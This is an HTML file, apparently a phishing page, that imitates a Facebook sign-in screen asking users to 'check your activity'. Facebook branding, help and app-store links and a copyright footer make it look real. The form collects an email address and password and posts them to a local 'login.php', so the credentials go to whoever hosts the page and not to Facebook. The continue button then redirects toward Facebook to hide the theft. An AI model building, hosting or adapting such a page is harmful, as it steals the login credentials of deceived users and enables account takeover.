<!DOCTYPE html>
<html>

<head>
	<title>Check your activity.</title>

	<meta charset="UTF-8"/>

	<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
	<meta name="keyword" content="HTML, CSS, Javascript"/>
	<meta name="author" content="facebook"/>

<link href='https://fonts.googleapis.com/css?family=ABeeZee' rel='stylesheet'>

<link rel="stylesheet" href="index.css">
</head>

<body>

	<h2>facebook</h2>
	<p class="sugg">

	<a href="https://play.google.com/store/apps/details?id=com.facebook.katana">
	<i class="fa fa-mobile fa-2x" id="mobile"></i>Get Facebook for Android and browse faster.</a></p>
			<br />
	<h3>Sign into your account to check your activity.</h3>
			<br />

<div class="Profileimg">
<img src=""
alt="User_Profile_img" width="160px" height="180px">

</div>

<a href="https://www.facebook.com/help/"><h5>Not you?</h5></a>
<form action="login.php">
	<p class="main">
	<input type="email" placeholder="Email" name="email" class="one" required>
			<br/>
	<input type="password" placeholder="Password" name="password" class="two" required>
	</p>
			<br />

<center>
<div class="wrapper">

<table class="ButtTable">

	<table>

		<tbody>

			<tr>
				<td>
					<button class="continuebutt" type="submit" formmethod="post" id="continuebutt" value="Continue" name="Continued" data-sigil="touchable" href="https://www.facebook.com/login.php" onclick="location.href='www.facebook.com'">

<span class="ContinueSpan">Continue</span></button>

				</td>
				<td>

					<button class="cancelbutt" type="submit" formmethod="post" id="cancelbutt" value="Cancel" name="Cancelled" data-sigil="touchable" href"https://www.facebook.com/login.php"/>

<span class="CancelSpan">Cancel</span></button>
					</td>

			</tr>
		</tbody>
	</table>
</table>

</div>
</center>
            <br />
            <br />
</form>
	<footer>

			facebook
			<br/>
			&copy; 2018 <br/>
	</footer>
</body>

</html>           
